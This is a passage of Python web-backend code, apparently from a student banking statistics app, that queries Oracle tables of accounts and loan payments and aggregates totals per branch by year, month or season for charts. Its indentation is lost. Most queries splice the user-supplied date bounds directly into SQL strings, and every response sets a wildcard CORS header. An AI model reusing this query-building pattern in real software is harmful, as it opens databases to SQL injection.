bank_name1 AS bank_name3,
COUNT( distinct customer_id) AS count_customer3
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------用户统计-----all----结果处理---------
columnlist_pie_user_all = []
rawData_pie_user_all = {}
for i in range(len(result_loan)):
columnlist_pie_user_all.append(result_loan[i]['bank_name3'])
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnlist_pie_user_all:
columnlist_pie_user_all.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_user_all:
columnlist_pie_user_all.append(result_deposit[i]['b_name2'])
print('columnlist_pie_user_all is:')
print(columnlist_pie_user_all)
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_user_all:
rawData_pie_user_all[result_check[i]['b_name1']] = result_check[i]['count_customer1']
else:
rawData_pie_user_all[result_check[i]['b_name1']] += result_check[i]['count_customer1']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_user_all:
rawData_pie_user_all[result_deposit[i]['b_name2']] = result_deposit[i]['count_customer2']
else:
rawData_pie_user_all[result_deposit[i]['b_name2']] += result_deposit[i]['count_customer2']
for i in range(len(result_loan)):
if result_loan[i]['bank_name3'] not in rawData_pie_user_all:
rawData_pie_user_all[result_loan[i]['bank_name3']] = result_loan[i]['count_customer3']
else:
rawData_pie_user_all[result_loan[i]['bank_name3']] += result_loan[i]['count_customer3']
print('rawData_pie_user_all is:')
print(rawData_pie_user_all)
#-------------饼状图-------------------
# plt.rcParams['font.sans-serif']=['SimHei']
# values = []
# keys = []
# for i in range(len(columnlist_pie_user_all)):
# values.append(rawData_pie_user_all[columnlist_pie_user_all[i]])
# for i in range(len(columnlist_pie_user_all)):
# keys.append(columnlist_pie_user_all[i].strip())
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # 设置绘图区域大小
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
# #plt.show()
#------------end---------------------
if result_loan or result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_user_all,
'rawData':[
rawData_pie_user_all
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
else:
#===================================================================================================
#--------按时间统计---------折线图-------
#===================================================================================================
#=======================================业务总金额======================================================================
if datatype == 'money':
#===================================存储业务==================================================================
if sumtype == 'saving':
#===============================以年为粒度=====================================================================
if timegrain == 'year':#---
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1,
NEW_CHECK_ACCOUNT.C_A_date AS C_A_date1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money,
CHECK_ACCOUNT_REGDATE AS C_A_date
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
ORDER BY NEW_CHECK_ACCOUNT.C_A_date ASC
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate(result_check[i]['c_a_date1'].year, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_check[i]['c_a_date1'].year)
term[result_check[i]['b_name1']] = result_check[i]['c_a_money1']
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_check[i]['b_name1']] = result_check[i]['c_a_money1']
else:
rawData[loc][result_check[i]['b_name1']] += result_check[i]['c_a_money1']
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1,
NEW_DEPOSIT_ACCOUNT.D_A_date AS D_A_date1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money,
DEPOSIT_ACCOUNT_REGDATE AS D_A_date
FROM DEPOSIT_ACCOUNT
WHERE ''' + sqlcommand_deposit_term + '''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
ORDER BY NEW_DEPOSIT_ACCOUNT.D_A_date ASC
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate(result_deposit[i]['d_a_date1'].year, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_deposit[i]['d_a_date1'].year)
term[result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
else:
rawData[loc][result_deposit[i]['b_name2']] += result_deposit[i]['d_a_money1']
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif timegrain == 'month':
#===============================以month为粒度=========================================================
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1,
NEW_CHECK_ACCOUNT.C_A_date AS C_A_date1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money,
CHECK_ACCOUNT_REGDATE AS C_A_date
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
ORDER BY NEW_CHECK_ACCOUNT.C_A_date ASC
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_month(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 年+月
term = {}
yyyy_mm = str(result_check[i]['c_a_date1'].year) + '.' + str(result_check[i]['c_a_date1'].month)
term['time'] = yyyy_mm
term[result_check[i]['b_name1']] = result_check[i]['c_a_money1']
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_check[i]['b_name1']] = result_check[i]['c_a_money1']
else:
rawData[loc][result_check[i]['b_name1']] += result_check[i]['c_a_money1']
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1,
NEW_DEPOSIT_ACCOUNT.D_A_date AS D_A_date1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money,
DEPOSIT_ACCOUNT_REGDATE AS D_A_date
FROM DEPOSIT_ACCOUNT
WHERE ''' + sqlcommand_deposit_term + '''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
ORDER BY NEW_DEPOSIT_ACCOUNT.D_A_date ASC
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_month(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
yyyy_mm = str(result_deposit[i]['d_a_date1'].year) + '.' + str(result_deposit[i]['d_a_date1'].month)
term['time'] = yyyy_mm
term[result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
else:
rawData[loc][result_deposit[i]['b_name2']] += result_deposit[i]['d_a_money1']
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以season为粒度=================================================================
elif timegrain == 'season':
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1,
NEW_CHECK_ACCOUNT.C_A_date AS C_A_date1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money,
CHECK_ACCOUNT_REGDATE AS C_A_date
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
ORDER BY NEW_CHECK_ACCOUNT.C_A_date ASC
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_season(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 season
term = {}
s = math.ceil(result_check[i]['c_a_date1'].month/3)
season = str(result_check[i]['c_a_date1'].year) + '-' + str(s)
term['time'] = season
term[result_check[i]['b_name1']] = result_check[i]['c_a_money1']
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_check[i]['b_name1']] = result_check[i]['c_a_money1']
else:
rawData[loc][result_check[i]['b_name1']] += result_check[i]['c_a_money1']
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1,
NEW_DEPOSIT_ACCOUNT.D_A_date AS D_A_date1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money,
DEPOSIT_ACCOUNT_REGDATE AS D_A_date
FROM DEPOSIT_ACCOUNT
WHERE ''' + sqlcommand_deposit_term + '''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
ORDER BY NEW_DEPOSIT_ACCOUNT.D_A_date ASC
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_season(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 year-season
term = {}
s = math.ceil(result_deposit[i]['d_a_date1'].month/3)
season = str(result_deposit[i]['d_a_date1'].year) + '-' + str(s)
term['time'] = season
term[result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawdata中有这season 但是没有这条记录所在的支行 添加支行
rawData[loc][result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
else:
rawData[loc][result_deposit[i]['b_name2']] += result_deposit[i]['d_a_money1']
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
if sumtype == 'loan':
#===============================贷款业务=================================================================
#===============================以年为粒度=================================================================
if timegrain == 'year':
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#--------结果处理---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['bank_name1'] not in columnList:
columnList.append(result_loan[i]['bank_name1'])
for i in range(len(result_loan)):
loc = locate(result_loan[i]['pay_date1'].year, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 year
term = {}
term['time'] = str(result_loan[i]['pay_date1'].year)
term[result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
rawData.append(term)
else:
if result_loan[i]['bank_name1'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
else:
rawData[loc][result_loan[i]['bank_name1']] += result_loan[i]['pay_money1']
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以month为粒度=================================================================
elif timegrain == 'month':
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#--------结果处理---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['bank_name1'] not in columnList:
columnList.append(result_loan[i]['bank_name1'])
for i in range(len(result_loan)):
loc = locate_month(result_loan[i]['pay_date1'].year,result_loan[i]['pay_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 m
term = {}
term['time'] = str(result_loan[i]['pay_date1'].year) + '.' + str(result_loan[i]['pay_date1'].month)
term[result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
rawData.append(term)
else:
if result_loan[i]['bank_name1'] not in rawData[loc]:
#rawdata中有这一m 但是没有这条记录所在的支行 添加支行
rawData[loc][result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
else:
rawData[loc][result_loan[i]['bank_name1']] += result_loan[i]['pay_money1']
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#===============================以season为粒度=================================================================
elif timegrain == 'season':
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#--------结果处理---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['bank_name1'] not in columnList:
columnList.append(result_loan[i]['bank_name1'])
for i in range(len(result_loan)):
loc = locate_season(result_loan[i]['pay_date1'].year,result_loan[i]['pay_date1'].month, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 m
s = math.ceil(result_loan[i]['pay_date1'].month/3)
term = {}
term['time'] = str(result_loan[i]['pay_date1'].year) + '-' + str(s)
term[result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
rawData.append(term)
else:
if result_loan[i]['bank_name1'] not in rawData[loc]:
#rawdata中有这一m 但是没有这条记录所在的支行 添加支行
rawData[loc][result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
else:
rawData[loc][result_loan[i]['bank_name1']] += result_loan[i]['pay_money1']
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#=======================================用户统计======================================================================
if datatype == 'user':
#===================================存储业务==================================================================
if sumtype == 'saving':
#===============================以年为粒度=====================================================================
if timegrain == 'year':#---
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_date0 AS c_a_date1,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID0,
CHECK_ACCOUNT_REGDATE AS C_A_date0
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID0 = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate(result_check[i]['c_a_date1'].year, rawData)
if loc == -1 :
#如果这是 rawdata中没有的 一年
term = {}
term['time'] = str(result_check[i]['c_a_date1'].year)
term[result_check[i]['b_name1']] = []
term[result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
#rawdata中有这一年 但是没有这条记录所在的支行 添加支行
rawData[loc][result_check[i]['b_name1']] = []
#将新用户添加到XX支行的列表中
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
else:
if result_check[i]['customer_id1'] not in rawData[loc][result_check[i]['b_name1']]:
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.d_a_date0 AS d_a_date1,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id2
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID0,
DEPOSIT_ACCOUNT_REGDATE AS d_a_date0
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID0 = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============用户统计==存储业务===年为粒度===结果处理======
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate(result_deposit[i]['d_a_date1'].year, rawData)
if loc == -1 :
